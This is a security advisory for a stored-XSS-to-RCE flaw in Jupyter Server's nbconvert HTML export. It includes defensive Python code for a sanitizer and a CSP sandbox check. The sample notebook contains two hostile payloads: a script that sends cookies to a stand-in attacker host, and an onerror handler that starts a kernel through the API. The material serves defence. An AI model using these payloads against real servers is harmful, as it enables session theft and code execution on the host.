Stored XSS and Remote Code Execution in Jupyter Server
CVE-2026-44727


Key Information:

Vendor: Project Jupyter (jupyter_server)
CVE Published: 22 June 2026

What is CVE-2026-44727?

In Jupyter Server versions before 2.20, the nbconvert HTTP handlers serve user-authored notebooks rendered to HTML, and two defaults combine to make that dangerous. The response carries no Content-Security-Policy with a sandbox directive, so the exported page runs in the server's own origin, and nbconvert's HTMLExporter does not sanitize HTML by default, so Markdown cells and text/html outputs are emitted verbatim. A notebook that contains attacker-controlled HTML or JavaScript is therefore rendered as a same-origin page for any victim who opens its HTML export: a stored XSS that can read the server's cookies, act with the victim's full authority against the REST API, and from there start and drive a kernel, which amounts to remote code execution on the host running Jupyter Server. The issue is fixed in jupyter_server 2.20.
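The two defaults the advisory contrasts, a non-sanitizing HTML export and a response without a CSP sandbox, can be checked independently. The following stdlib-only Python is an added example and not Jupyter Server's or nbconvert's own code: the allowlist sanitizer is a stand-in for the kind of filtering nbconvert's optional sanitize_html path performs, the allowlist, the sample notebook and its payloads are constructed for the demonstration, and csp_isolates_origin() is the check to run against the Content-Security-Policy header a server actually returns for its nbconvert HTML endpoint.

```python
"""Two defences for serving user-authored notebook HTML (added example, stdlib only).
The sanitizer is an allowlist stand-in, NOT nbconvert's implementation; the CSP
check is meant for the header a real server returns (e.g. from `curl -i`)."""
import copy
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed allowlist: the markup a rendered notebook legitimately needs.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "code", "pre", "ul", "ol", "li", "a",
                "img", "table", "thead", "tbody", "tr", "td", "th", "h1", "h2", "h3",
                "br", "div", "span"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}, "td": {"colspan"}}
SAFE_SCHEMES = {"http", "https", "mailto"}  # relative URLs pass; javascript:/data: do not
VOID_TAGS = {"br", "img"}


class AllowlistSanitizer(HTMLParser):
    """Drops disallowed tags, every on* handler attribute and unsafe URL schemes;
    the *contents* of <script>/<style> are dropped too, not just the tags."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
            return
        if self._skip or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, ()):
                continue
            if name in ("href", "src"):
                scheme = urlsplit(value.strip()).scheme.lower()
                if scheme and scheme not in SAFE_SCHEMES:
                    continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = max(0, self._skip - 1)
        elif not self._skip and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))  # re-escape <, >, & in text
    # comments, declarations and processing instructions are silently dropped


def sanitize_html(fragment: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def sanitize_notebook(nb: dict) -> dict:
    """Copy of a v4 notebook with the author-controlled HTML surfaces sanitized:
    Markdown cell sources and text/html outputs."""
    clean = copy.deepcopy(nb)
    for cell in clean["cells"]:
        if cell["cell_type"] == "markdown":
            cell["source"] = sanitize_html("".join(cell["source"]))
        for output in cell.get("outputs", []):
            data = output.get("data", {})
            if "text/html" in data:
                data["text/html"] = sanitize_html("".join(data["text/html"]))
    return clean


def parse_csp(header: str) -> dict:
    """Parse a Content-Security-Policy header into {directive: [tokens]}."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return policy


def csp_isolates_origin(header: str) -> bool:
    """True iff the policy puts the document in an opaque origin: a sandbox directive
    is present and does not grant allow-same-origin. `sandbox allow-scripts` still
    isolates: scripts run, but cannot read the server's cookies or pass its
    same-origin/XSRF checks."""
    policy = parse_csp(header)
    return "sandbox" in policy and "allow-same-origin" not in policy["sandbox"]


# Constructed sample notebook (nbformat v4 layout) carrying two typical payloads.
SAMPLE_NOTEBOOK = {
    "nbformat": 4, "nbformat_minor": 5, "metadata": {},
    "cells": [
        {"cell_type": "markdown", "id": "c1", "metadata": {}, "source": [
            "# Report\n",
            "<script>fetch('https://evil.example/?c=' + document.cookie)</script>\n"]},
        {"cell_type": "code", "id": "c2", "metadata": {}, "execution_count": 1,
         "source": ["display(html)"],
         "outputs": [{"output_type": "display_data", "metadata": {}, "data": {"text/html": [
             "<img src=\"x\" onerror=\"fetch('/api/kernels', {method: 'POST'})\">"]}}]},
    ],
}

if __name__ == "__main__":
    clean = sanitize_notebook(SAMPLE_NOTEBOOK)
    print(repr(clean["cells"][0]["source"]))
    print(clean["cells"][1]["outputs"][0]["data"]["text/html"])
    for hdr in ("default-src 'self'", "sandbox allow-scripts",
                "sandbox allow-scripts allow-same-origin"):
        print(f"{hdr!r:45} isolates origin: {csp_isolates_origin(hdr)}")
```

The CSP check encodes the caveat a practitioner should carry away: `sandbox allow-scripts` is enough to isolate the export (scripts run, but in an opaque origin with no access to the server's cookies or same-origin API), whereas adding `allow-same-origin` hands the origin back and reopens the stored-XSS path even though a sandbox directive is nominally present. The two layers are complementary: the sandbox limits what injected script can do, the sanitizer limits what gets injected in the first place.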

Affected Version(s)

jupyter_server < 2.20

CVSS V4

Score: 9.3
Severity: CRITICAL
Confidentiality: High
Integrity: High
Availability: High
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: Undefined
User Interaction: Unknown

Timeline

  • Vulnerability published: 22 June 2026

  • Vulnerability reserved